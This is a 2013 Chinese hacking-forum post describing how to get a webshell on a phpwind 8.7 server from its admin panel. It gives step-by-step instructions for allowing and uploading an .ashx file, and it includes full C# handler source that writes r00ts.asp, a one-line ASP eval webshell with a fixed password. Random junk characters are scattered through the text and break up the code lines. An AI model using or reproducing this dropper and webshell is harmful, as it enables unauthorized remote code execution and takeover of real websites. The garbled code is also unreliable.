找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2089|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小, N! P2 b5 S2 }

4 ]( ?$ H( q& M) o* D1 a群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx4 g  o6 v7 E$ a% A: @/ `* Y
4 @; M9 Z" G$ m+ m: \
发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整! U3 x: v  N9 l$ O# Y
- B0 w- Q2 v' g5 m0 ~) b
然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
# X2 a( K6 T2 l' L) F
; [& P1 E% x, `  K  @6 g2 a打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
8 u2 H) E1 R/ ^# u! `3 _ & i4 k; P& \# V1 ?3 P
下面是代码:
1 H% N3 l# a' A4 X( ^0 R: G& ~" V
7 I# @  A! p* A  p2 r* r3 X2 F<%@ WebHandler Language="C#"Class="Handler" %>
. @/ R8 r6 K* I0 v9 R$ Q9 jusing System;
- C6 Q# _+ Z; O+ q5 f" Kusing System.Web;
: a. I+ v! J6 d( cusing System.IO;4 l# r) Y$ l# i0 G! j0 I( N" }
public class Handler : IHttpHandler {
/ K/ j, {/ P" a, R* ?+ P7 Vpublic void ProcessRequest (HttpContext context) {4 ?3 U  C( l, ~+ [- c6 w
context.Response.ContentType = "text/plain";# t' A( O- N3 D1 P
StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
3 a# p, S6 g! |" R" K, i% O( Jfile1.Write("<%eval request(\"r00ts\")%>");
( H+ Q, Q7 P( p! n9 p" }file1.Flush();
  `: Y- X& {; A* s. x1 Kfile1.Close();+ o: S4 n) [$ L; j/ I4 \9 X: w; w
}
- i7 E+ H1 ?# Rpublic bool IsReusable {( d; d( s& F# h. O5 a8 [
get {
" b5 W: ]/ Q" H: H1 D- t4 Rreturn false;
# a$ D* c7 Q: L  n! F. Z. T4 W* A}% F, [7 d9 c3 k6 L1 p- R! I
}
) H3 K" u# G7 j}
% X3 M2 {: A  v2 G
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表